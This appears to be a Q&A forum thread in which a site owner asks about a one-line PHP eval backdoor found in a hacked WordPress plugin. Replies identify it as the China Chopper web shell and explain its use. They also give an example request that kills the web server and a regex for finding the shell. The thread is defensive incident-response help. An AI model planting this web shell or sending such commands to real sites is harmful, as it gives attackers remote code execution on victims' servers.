# Found <?php @eval($_POST['pass']);?> code in wordpress site

Tags: php, post, passwords, eval

I found this  code in one of my wordpress plugin site.
I guess it can be used with malicious intent but what exactly it does and can I find out if it calls some other actions that I should be aware of?

Comment: I'd need some surrounding code. What does the plugin do? Malicious intent was my first guess too.

Comment: It is a trusted plugin WP Migrate DB, but the site was hacked and I am trying to clean up all the residue

Comment: I'm not sure you can tell if it's a hack without looking at all the other code involved which, if your site was hacked, could potentially be any wordpress file at all. I would reinstall WP and all plugins from trusted sources.

Alternately, you could always try commenting out that line and seeing if anything breaks :)

Comment: I forgot to mention, that is the only code in that file. File is called functions.php so I guess being deeper in the plugin directory it is safe to delete.

Comment: That seems to mean that there's another file somewhere that calls functions.php and uses it to grab your password, without it being obvious that it's dealing with your password. I would give this file a 99% chance of being part of a hack. I would delete all your plugins and reinstall them at the very least

Comment: I have deleted the file and the website is working fine. Just would like to know if there was more to it... thanks for help anyway.

Comment: It looks _very_ bad. Probably it wasn't the only backdoor.

Comment: I ran WordFence on the WordPress site I was fixing - and thought I had fixed - it found two further major exploits.

Answer (score 5):

This PHP script belongs to China Chopper Hacking Kit.

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

Comment: Sorry, now knowing this, how would you hunt it down on the server since the search for only password or pass would give to many results... ?

Comment: Another option is using Reg-Ex.. Something like this : /<?php.\@eval\(\$_POST./

Comment: May be a short post but it is an excellent article -  thanks - if you have been hit by this don't miss removing the database entries.

Answer (score 3):

Yes, it is very bad. I can't imagine any situation where this code could exist as the part of a harmless software.

This code essentially allows to run any php code given by the `pass` get parameter. For example, calling this php as `http://yoursite/your.php?pass=system("killall -9 apache");` will shot down your webserver. But it is usable for anything (including overwriting / extending your existing scripts to save the site passwords in a temporary file. And later to get this temporary file back).

It is probably a backdoor, and probably not the only one. Your site needs a deep security check.

Comment: Thanks Peter. I took the website down and will go through it with anti virus and anti malware scan. Is there a list of possible malicious codes that I could try and search through the files?

Comment: Actually Peter, knowing that that piece of code is used to write the site's password to a file how would one go about finding where that file resides and the way attacker is attending to view/download the file?

Comment: @Jessica217 - Actually you do not know what the code does, the attacker can send a POST request and can put whatever he wants into the 'pass' field. Instead of a password he will enter a script he wants to execute.

Comment: Okay thanks. Could I scan a website for 'pass' field and then go slowly to see what each does?

Comment: @Jessica217 You can do that, but it won' help a lot in your current problem. "pass", as a variable name, will most probably in the context of "passthrough" or "password" used. In your current context was it used as "pass", because a variable named `$codeToRunInBackdoor` had been maybe a little bit flashy.